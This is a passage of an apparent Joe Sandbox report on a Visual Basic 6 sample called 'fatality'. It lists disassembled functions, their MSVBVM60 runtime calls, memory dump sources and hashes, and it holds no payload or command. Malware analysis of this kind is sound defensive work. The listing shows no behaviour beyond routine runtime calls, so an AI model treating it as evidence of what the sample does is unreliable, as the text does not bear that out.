                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00419809
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 0041980F
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00419822
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,0041984F,6CEBD8B1,00000000,6CEB2523), ref: 00419848
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(00000000,6CEBD8B1,00000000,6CEB2523), ref: 00419860
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3281955820-0
                                                                                                                                                            • Opcode ID: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
                                                                                                                                                            • Instruction ID: 91cd715af1cd97156beb3a758445edf250c8698d8b352ee1a2a14870601594c5
                                                                                                                                                            • Opcode Fuzzy Hash: ccc3478dbcd7e51189b4f7c35bd8fb3331cd942d6aa921c6006e7f43fcf8eea8
                                                                                                                                                            • Instruction Fuzzy Hash: E0418F75910219AFCB04EFA4CD95AEEB7B9FF48700F14811AE501B7290D7B4AC81CBE9
                                                                                                                                                            Function 00410560 Relevance: 18.1, APIs: 12, Instructions: 129COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,?,004025E6), ref: 00410645
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 0041067E
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004106D3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 004106FC
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410712
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 00410735
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,004025E6), ref: 00410758
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$Chkstk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1207130036-0
                                                                                                                                                            • Opcode ID: 62ff90cb35de8ef11aa2b30622b115efdf93fef2ebd10f5ae9c3101067cccd5d
                                                                                                                                                            • Instruction ID: 2137da7fcd73fff1979705b1bef70d61cd8a95bb74c88752949aaefb45c8b53a
                                                                                                                                                            • Opcode Fuzzy Hash: 62ff90cb35de8ef11aa2b30622b115efdf93fef2ebd10f5ae9c3101067cccd5d
                                                                                                                                                            • Instruction Fuzzy Hash: 6C5107B4901208EBDB14DFA4DA48BDEBBB4FF48314F20805AE51477390C7B99A84DF69
                                                                                                                                                            Function 00410E60 Relevance: 18.1, APIs: 12, Instructions: 85COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,0040BC66,0041B038,?,?,?,004025E6), ref: 00410E7E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00410EAE
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00410EC5
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,00000000,004025E6), ref: 00410ED1
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410EDF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00410EE8
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F03
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F14
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F25
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410F33
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,00000000,004025E6), ref: 00410F41
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,00000000,004025E6), ref: 00410F57
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$AnsiErrorUnicode$FreeSystem$ChkstkList
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3861917509-0
                                                                                                                                                            • Opcode ID: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                            • Instruction ID: d7813b94c935956c428f1e1f47a44fa569b160c913a03527725d119065563702
                                                                                                                                                            • Opcode Fuzzy Hash: c1be402e434711134876b1e75af30f3fda5167bf00b65e5935c09ae6f9679a43
                                                                                                                                                            • Instruction Fuzzy Hash: 9E31ECB5901208EFDB04DFA4DA49BDEBBB8FB48714F108119F515BB290D7B89A44CBA4
                                                                                                                                                            Function 0040FA50 Relevance: 18.1, APIs: 12, Instructions: 67COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                            • #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                            • __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FileFree$#525#570#648ChkstkCloseCopyErrorGet3MoveOpen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 947554498-0
                                                                                                                                                            • Opcode ID: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                            • Instruction ID: 2ea1275da5938a61f9bbdbea3727b2d8b601beaa9e21b66b0b90c65097ce1408
                                                                                                                                                            • Opcode Fuzzy Hash: e9e615465a2034f7d721f361e5a725c75608ada2b2abae78992f9bdf205b699b
                                                                                                                                                            • Instruction Fuzzy Hash: A031ECB5800248EBDB04DFD4DA58BDEBBB4FF08715F208169E511B72A0DB795A44CB64
                                                                                                                                                            Function 00404843 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 130COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040CF8E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,004025E6), ref: 0040CFD5
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0040D006
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,0000004C), ref: 0040D039
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040D078
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0C1
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,00000040), ref: 0040D0F9
                                                                                                                                                            • __vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 0040D11C
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D12F
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040D152
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D15D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040D190
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040D1AB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckFreeHresult$CallCastChkstkErrorLateList
                                                                                                                                                            • String ID: ?
                                                                                                                                                            • API String ID: 269068952-1684325040
                                                                                                                                                            • Opcode ID: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                            • Instruction ID: e12f10e6882a07b68982d9b1f0c67d4f52429f3b1a0b66e6b96f65459c310862
                                                                                                                                                            • Opcode Fuzzy Hash: 1eafb0bb2cb90cbeb5fe44f42e07e9b228fda82a0d81194327b73e356765a8c2
                                                                                                                                                            • Instruction Fuzzy Hash: 06511B75900208EBDB14DFA4C948BDEBBB4FF48704F208269F509BB291D7759A85CF68
                                                                                                                                                            Function 00415C8A Relevance: 16.5, APIs: 11, Instructions: 31COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$CloseFile$DestructExitProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1320429144-0
                                                                                                                                                            • Opcode ID: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                            • Instruction ID: ac45af5dedd4f35385674aac5ef352c541f385de1dfbdc7eb18f47d75152aea7
                                                                                                                                                            • Opcode Fuzzy Hash: e72f65d1b9acbe311dcb925acb13922c15ed09f160c56a860b095a3286b9a039
                                                                                                                                                            • Instruction Fuzzy Hash: 53F0A471C1416CDBCB08EBA0ED55ADDBB38EF94310F11402AE846B31B49E702E85CEA4
                                                                                                                                                            Function 0040E570 Relevance: 15.1, APIs: 10, Instructions: 72COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E58E
                                                                                                                                                            • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,004025E6), ref: 0040E5D4
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E5E3
                                                                                                                                                            • __vbaVarVargNofree.MSVBVM60(?,?,?,?,004025E6), ref: 0040E5F6
                                                                                                                                                            • __vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,004025E6), ref: 0040E5FD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E608
                                                                                                                                                            • __vbaChkstk.MSVBVM60 ref: 0040E620
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E646
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040E652
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(0040E67A,?,?,?,?,?,?,004025E6), ref: 0040E673
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ChkstkFree$AddrefCopyErrorEventMoveNofreeRaiseVarg
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3705209087-0
                                                                                                                                                            • Opcode ID: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
                                                                                                                                                            • Instruction ID: 36ceea50de92772e66bb97ede622d2113149341719cd49f3f7e07eaeda4390cb
                                                                                                                                                            • Opcode Fuzzy Hash: a744b2239620e2a90fce2d31a3f43e904dc0f5ab9ad7dd985c9743abacca18f0
                                                                                                                                                            • Instruction Fuzzy Hash: 9F31F875900208EFCB04DF94C949B9DBBB4FF48304F108669F515B73A0D774AA85CB98
                                                                                                                                                            Function 00404829 Relevance: 12.1, APIs: 8, Instructions: 84COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckHresult$ErrorExitFreeListNew2Proc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 306309671-0
                                                                                                                                                            • Opcode ID: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                            • Instruction ID: 6c1e095cc9405d84f172de8fc6481e1172c739fb8f3d4ebecced46b1c4c61411
                                                                                                                                                            • Opcode Fuzzy Hash: f05c769eef4a069bf0385cfeb3677b75dac682b0aa44aeb3ef3202b0df133bc0
                                                                                                                                                            • Instruction Fuzzy Hash: 7F312D71910214EBDB10AF95CE89EDEBBBCFF08B40F10412AF545B3690D77899458BA9
                                                                                                                                                            Function 00414D90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60(6CEBD83C,00000000), ref: 00414DCE
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60(h#@,6CEBD83C,00000000), ref: 00414DE2
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00414E27
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00414E32
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba_adj_fdiv_m64
                                                                                                                                                            • String ID: h#@
                                                                                                                                                            • API String ID: 2746309926-1911584123
                                                                                                                                                            • Opcode ID: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                            • Instruction ID: 05541adafa65650a58b6c4144f1ab09d364fc37ea7f5c0a10f88b274b74e223b
                                                                                                                                                            • Opcode Fuzzy Hash: ab1f15620a1f862a28e7d7e9291dcfa6d74d0e301d23102f988617b6e0f2e5da
                                                                                                                                                            • Instruction Fuzzy Hash: 2E214570A04301AFC7489F28EB4829ABBE5FBC8351F10853EE584962A4DB7C88D4C71A
                                                                                                                                                            Function 00418E20 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,0041B108,00000011,00000001,00000FFF,00000000,00000000,00419504), ref: 00418E5D
                                                                                                                                                            • __vbaGetOwner3.MSVBVM60(00407524,0041B108,00000000), ref: 00418E78
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00418E9A
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00418EAA
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EE6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EFC
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(00000000,00419504), ref: 00418F21
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$OverflowOwner3Redim
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3413436688-0
                                                                                                                                                            • Opcode ID: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                            • Instruction ID: a558a39c5bab9556473eca7b03ab59ba202b493018f5e1d000dd0332b3e70a7e
                                                                                                                                                            • Opcode Fuzzy Hash: 280288ce2d1da6d587684357634afb95be1490d94e7fd3b2f1c4005324fb1fb1
                                                                                                                                                            • Instruction Fuzzy Hash: F021D338604361EBC714CF14ED65BE17762FB48781B158069EE01A77A5CBB5A8C1CBDC
                                                                                                                                                            Function 0040E6A0 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6EA
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6F8
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E703
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E723
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E72C
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E736
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E73F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CastCheckErrorEventExitFreeHresultProcRaise
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2392155486-0
                                                                                                                                                            • Opcode ID: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                            • Instruction ID: 64c0aa39b9ec461804333c35a90b8c194e87fd5da105c06a014ba34ae980e718
                                                                                                                                                            • Opcode Fuzzy Hash: b7ab2b53e9fe8407814622c4ea2936945701b59724f8c03dfa2f10b314959642
                                                                                                                                                            • Instruction Fuzzy Hash: 3211BF71900254ABCB00AFA5CD49E9E7B78FF49B04F10852AF945B62E1C77854418BE9
                                                                                                                                                            Function 00417458 Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00417458
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004174A7), ref: 0041747C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417484
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041748C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417494
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041749C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004174A4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
